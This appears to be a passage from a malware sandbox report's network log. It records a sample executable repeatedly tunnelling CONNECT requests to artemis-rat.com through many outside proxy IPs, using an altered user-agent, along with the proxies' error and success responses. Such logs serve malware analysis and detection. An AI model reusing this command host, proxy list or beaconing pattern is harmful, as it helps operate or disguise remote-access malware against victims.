                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905071020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1919192.168.2.55518293.126.56.3041533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.964027882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1920192.168.2.551707185.208.102.5580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.966078997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.092526913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.202147007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.202186108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1921192.168.2.555187221.231.13.19810803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.966080904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1922192.168.2.555185222.223.103.23273023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.966608047 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.310465097 CET90INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 55


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1923192.168.2.55521338.162.25.231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.979317904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.435564995 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1924192.168.2.551014117.160.250.16399993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.980967045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.014518976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.971826077 CET221INHTTP/1.1 403 Access Denied
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:50 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-store
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                                                                                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                                                                                                                                                                            Data Ascii: You are not allowed to access the document.
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.970778942 CET221INHTTP/1.1 403 Access Denied
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:50 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-store
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                                                                                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                                                                                                                                                                            Data Ascii: You are not allowed to access the document.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1925192.168.2.55521723.19.244.10910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.981578112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1926192.168.2.55521544.190.9.65481003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.982561111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1927192.168.2.555214162.223.89.84803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.986198902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.623802900 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:51 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1928192.168.2.55478939.109.113.9731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.007514000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.014547110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.014746904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.735773087 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.16.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:09:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.944502115 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.16.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:09:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1929192.168.2.55370792.205.110.118183743876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.008243084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.014549971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.014745951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.108282089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1930192.168.2.555193138.2.73.15710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.008485079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1931192.168.2.55520443.155.171.35156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.009929895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1932192.168.2.55486651.89.173.40301993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.012301922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.701998949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.702094078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.592749119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.389576912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.202092886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.092590094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1933192.168.2.555190109.194.22.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.038523912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1934192.168.2.554916109.86.182.20331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.041832924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.092705011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.202147007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.202289104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1935192.168.2.555218154.12.178.107299853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.155867100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1936192.168.2.555186196.251.131.3880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.156111956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1937192.168.2.55520841.111.198.108803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.156984091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.476449966 CET708INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 532
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
